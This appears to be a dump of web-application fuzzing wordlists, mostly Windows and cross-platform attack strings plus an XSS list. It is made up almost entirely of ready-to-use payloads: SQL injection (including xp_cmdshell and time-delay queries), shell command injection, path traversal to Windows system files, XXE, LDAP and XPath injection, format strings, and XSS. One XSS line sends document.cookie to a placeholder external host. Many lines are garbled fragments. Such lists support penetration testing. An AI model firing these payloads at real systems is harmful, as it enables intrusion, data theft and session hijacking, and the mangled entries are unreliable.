/
483 | id%00
484 | id%00|
485 | insert
486 | like
487 | limit
488 | null
489 | or
490 | or 0=0 #
491 | or 0=0 --
492 | or 1=1--
493 | or%201=1
494 | or%201=1 --
495 | response.write 111111
496 | something%00html
497 | update
498 | x' or 1=1 or 'x'='y
499 | x' or name()='username' or 'x'='y
500 | xsstest
501 | xsstest%00"<>'
502 | {'}
503 | |/usr/bin/id
504 | |/usr/bin/id|
505 | |id
506 | |id;
507 | |id|
508 | |ls
509 | |ls -la
510 | |nid\n
511 | |usr/bin/id\n
512 | ||
513 | || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
514 | ||/usr/bin/id;
515 | ||/usr/bin/id|
516 | }
517 |
--------------------------------------------------------------------------------
/fuzzfull/all-attacks-win.txt:
--------------------------------------------------------------------------------
1 | # a wide sample of malicious input for windows targets
2 | A
3 | TRUE
4 | FALSE
5 | 0
6 | 00
7 | 1
8 | -1
9 | 1.0
10 | -1.0
11 | 2
12 | -2
13 | -20
14 | 65536
15 | 268435455
16 | -268435455
17 | 2147483647
18 | 0xfffffff
19 | NULL
20 | null
21 | \0
22 | \00
23 | < script > < / script>
24 | %0a
25 | %00
26 | +%00
27 | \0
28 | \0\0
29 | \0\0\0
30 | \00
31 | \00\00
32 | \00\00\00
33 | $null
34 | $NULL
35 | `dir`
36 | \nnetstat -a%\n
37 | \"blah
38 | |dir|
39 | ";id"
40 | dir%00
41 | dir%00|
42 | |dir
43 | |dir|
44 | |/bin/ls -al
45 | ?x=
46 | ?x="
47 | ?x=|
48 | ?x=>
49 | /boot.ini
50 | ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
51 | ../../boot.ini
52 | /../../../../../../../../%2A
53 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
54 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
55 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
56 | ../../../../../../../../conf/server.xml
57 | C:/inetpub/wwwroot/global.asa
58 | C:\inetpub\wwwroot\global.asa
59 | C:/boot.ini
60 | C:\boot.ini
61 | ../../../../../../../../../../../../localstart.asp%00
62 | ../../../../../../../../../../../../localstart.asp
63 | ../../../../../../../../../../../../boot.ini%00
64 | ../../../../../../../../../../../../boot.ini
65 | /./././././././././././boot.ini
66 | /../../../../../../../../../../../boot.ini%00
67 | /../../../../../../../../../../../boot.ini
68 | /..\../..\../..\../..\../..\../..\../boot.ini
69 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
70 | \..\..\..\..\..\..\..\..\..\..\boot.ini
71 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00
72 | ..\..\..\..\..\..\..\..\..\..\boot.ini
73 | /../../../../../../../../../../../boot.ini%00.html
74 | /../../../../../../../../../../../boot.ini%00.jpg
75 | /.../.../.../.../.../
76 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
77 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
78 | %0d%0aX-Injection-Header:%20AttackValue
79 | !@#0%^#0##018387@#0^^**(()
80 | %01%02%03%04%0a%0d%0aADSF
81 | /,%ENV,/
82 | <!--#exec%20cmd="dir"-->
83 | <!--#exec%20cmd="dir"-->
84 | %
85 | #
86 | *
87 | }
88 | ;
89 | /
90 | \
91 | \\
92 | \\/
93 | \\\\*
94 | \\\\?\\
95 | <
96 | <
97 | <
98 | <
99 | <
100 | <<
101 | <<<
102 | |
103 | ||
104 | `
105 | -
106 | --
107 | *|
108 | ^'
109 | \'
110 | /'
111 | @'
112 | (')
113 | {'}
114 | [']
115 | *'
116 | #'
117 | !'
118 | !@#$%%^#$%#$@#$%$$@#$%^^**(()
119 | %01%02%03%04%0a%0d%0aADSF
120 | \t
121 | "\t"
122 |
123 |
124 |
125 |
126 | #xD
127 | #xA
128 | #xD#xA
129 | #xA#xD
130 | /%00/
131 | %00/
132 | %00
133 | xxxyyy
235 | ">
237 | <
238 |
239 | '>
240 | '>
241 | \";alert('XSS');//
242 | %3cscript%3ealert("XSS");%3c/script%3e
243 | %3cscript%3ealert(document.cookie);%3c%2fscript%3e
244 | %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
245 | <script>alert(document.cookie);
246 | <script>alert(document.cookie);<script>alert
247 |
248 |
249 | ;)
250 | )
252 | )
253 | ![](javascript:alert("XSS"))
254 | ![](`javascript:alert("'XSS'")`)
255 | ![]()
">
256 | ))
257 |
258 | ;)
259 |
260 | ;)
261 | ;)
262 | ;)
263 | ![]()
264 | ![]()
265 |
266 |
267 |
268 |
269 | '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
270 | ">
271 | %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
272 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{}
273 | '';!--"=&{()}
274 |
275 | '
276 | "
277 | #
278 | -
279 | --
280 | ' --
281 | --';
282 | ' ;
283 | = '
284 | = ;
285 | = --
286 | \x23
287 | \x27
288 | \x3D \x3B'
289 | \x3D \x27
290 | \x27\x4F\x52 SELECT *
291 | \x27\x6F\x72 SELECT *
292 | 'or select *
293 | admin'--
294 | ';shutdown--
295 | <>"'%;)(&+
296 | ' or ''='
297 | ' or 'x'='x
298 | " or "x"="x
299 | ') or ('x'='x
300 | 0 or 1=1
301 | ' or 0=0 --
302 | " or 0=0 --
303 | or 0=0 --
304 | ' or 0=0 #
305 | " or 0=0 #
306 | or 0=0 #
307 | ' or 1=1--
308 | " or 1=1--
309 | ' or '1'='1'--
310 | "' or 1 --'"
311 | or 1=1--
312 | or%201=1
313 | or%201=1 --
314 | ' or 1=1 or ''='
315 | " or 1=1 or ""="
316 | ' or a=a--
317 | " or "a"="a
318 | ') or ('a'='a
319 | ") or ("a"="a
320 | hi" or "a"="a
321 | hi" or 1=1 --
322 | hi' or 1=1 --
323 | hi' or 'a'='a
324 | hi') or ('a'='a
325 | hi") or ("a"="a
326 | 'hi' or 'x'='x';
327 | @variable
328 | ,@variable
329 | PRINT
330 | PRINT @@variable
331 | select
332 | insert
333 | as
334 | or
335 | procedure
336 | limit
337 | order by
338 | asc
339 | desc
340 | delete
341 | update
342 | distinct
343 | having
344 | truncate
345 | replace
346 | like
347 | handler
348 | bfilename
349 | ' or username like '%
350 | ' or uname like '%
351 | ' or userid like '%
352 | ' or uid like '%
353 | ' or user like '%
354 | exec xp
355 | exec sp
356 | '; exec master..xp_cmdshell
357 | '; exec xp_regread
358 | t'exec master..xp_cmdshell 'nslookup www.google.com'--
359 | --sp_password
360 | \x27UNION SELECT
361 | ' UNION SELECT
362 | ' UNION ALL SELECT
363 | ' or (EXISTS)
364 | ' (select top 1
365 | '||UTL_HTTP.REQUEST
366 | 1;SELECT%20*
367 | to_timestamp_tz
368 | tz_offset
369 | <>"'%;)(&+
370 | '%20or%201=1
371 | %27%20or%201=1
372 | %20$(sleep%2050)
373 | %20'sleep%2050'
374 | char%4039%41%2b%40SELECT
375 | '%20OR
376 | 'sqlattempt1
377 | (sqlattempt2)
378 | |
379 | %7C
380 | *|
381 | %2A%7C
382 | *(|(mail=*))
383 | %2A%28%7C%28mail%3D%2A%29%29
384 | *(|(objectclass=*))
385 | %2A%28%7C%28objectclass%3D%2A%29%29
386 | (
387 | %28
388 | )
389 | %29
390 | &
391 | %26
392 | !
393 | %21
394 | ' or 1=1 or ''='
395 | ' or ''='
396 | x' or 1=1 or 'x'='y
397 | /
398 | //
399 | //*
400 | */*
401 | @*
402 | count(/child::node())
403 | x' or name()='username' or 'x'='y
404 | ','')); phpinfo(); exit;/*
405 | var n=0;while(true){n++;}]]>
406 | SCRIPT]]>alert('XSS');/SCRIPT]]>
407 | SCRIPT]]>alert('XSS');/SCRIPT]]>
408 |
409 | ]>&xxe;
410 | ]>&xxe;
411 | ]>&xxe;
412 | ]>&xxe;
413 | ]]>
414 | <IMG SRC="javascript:alert('XSS')">
415 |
416 | XSS
417 |
418 | '
419 | '--
420 | ' or 1=1--
421 | 1 or 1=1--
422 | ' or 1 in (@@version)--
423 | 1 or 1 in (@@version)--
424 | '; waitfor delay '0:30:0'--
425 | 1; waitfor delay '0:30:0'--
426 | '||Utl_Http.request('http://') from dual--
427 | 1||Utl_Http.request('http://') from dual--
428 | xsstest
429 | xsstest%00"<>'
430 |
431 |
432 | ))))))))))
433 | ../../../../../../../../../../boot.ini
434 | ..\..\..\..\..\..\..\..\..\..\boot.ini
435 | ../../../../../../../../../../windows/win.ini
436 | ..\..\..\..\..\..\..\..\..\..\windows\win.ini
437 | || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
438 | | ping -i 30 127.0.0.1 |
439 | | ping -n 30 127.0.0.1 |
440 | & ping -i 30 127.0.0.1 &
441 | & ping -n 30 127.0.0.1 &
442 | ; ping 127.0.0.1 ;
443 | %0a ping -i 30 127.0.0.1 %0a
444 | `ping 127.0.0.1`
445 | ;echo 111111
446 | echo 111111
447 | response.write 111111
448 | :response.write 111111
449 | http:///
450 | %0aCc:
451 | %0d%0aCc:
452 | %0aBcc:
453 | %0d%0aBcc:
454 | %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a
455 | %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
456 | # known cross platform source Code, file disclosure attack patterns - append after file or dir path
457 | %70
458 | .%E2%73%70
459 | %2e0
460 | %2e
461 | .
462 | \
463 | ?*
464 | %20
465 | %00
466 | %2f
467 | %5c
468 | count(/child::node())
469 | x' or name()='username' or 'x'='y
470 | var n=0;while(true){n++;}]]>
471 | SCRIPT]]>alert('XSS');/SCRIPT]]>
472 | "SCRIPT]]>alert('XSS');/SCRIPT]]>"
473 | ""
474 | "]>&xxe;"
475 | "]>&xxe;"
476 | "]>&xxe;"
477 | "]>&xxe;"
478 | "]]>"
479 | "![]()
cript:alert('XSS')"">"
480 | ""
481 | "XSS"
482 | %00
483 | NULL
484 | null
485 | '
486 | "
487 | ;
488 |
498 | ">
499 | %0d
500 | %0a
501 | %7f
502 | %ff
503 | -1
504 | other
505 | %s%p%x%d
506 | %99999999999s
507 | %08x
508 | %20d
509 | %20n
510 | %20x
511 | %20s
512 | %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
513 | %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
514 | %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
515 | %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
516 | %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
517 | %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
518 | %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
519 | %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
520 | %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
521 | %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
522 | %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
523 | %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
524 | %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
525 | %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
526 | %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
527 | %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
528 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
529 | XXXXX.%p
530 | XXXXX`perl -e 'print ".%p" x 80'`
531 | `perl -e 'print ".%p" x 80'`%n
532 |
--------------------------------------------------------------------------------
/fuzzfull/all-attacks-xplatform.txt:
--------------------------------------------------------------------------------
1 | !'
2 | !@#$%%^#$%#$@#$%$$@#$%^^**(()
3 | !@#0%^#0##018387@#0^^**(()
4 | ">]]>
43 |
44 |
45 | ]>&xee;
46 | ]>&xee;
47 | ]>&xee;
48 | ]>&xee;
49 |
50 | SCRIPT]]>alert('gotcha');/SCRIPT]]>
51 | ','')); phpinfo(); exit;/*
52 | 0
53 | 0.00005
54 | 0.1
55 | 0.9
56 | 1
57 | -1
58 | 1.7976931348623157e+308
59 | 5e-10
60 | 5e-324
61 | count(/child::node())
62 | false
63 | null
64 | true
65 | x' or 1=1 or 'x'='y
66 | x' or name()='username' or 'x'='y
67 |
--------------------------------------------------------------------------------
/xss.txt:
--------------------------------------------------------------------------------
1 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode
2 | //-->">'>
3 | '';!--"=&{()}
4 |
5 |
6 | )
7 | ![]()
">
8 |
9 | <
10 |
11 | \";alert('XSS');//
12 |
13 |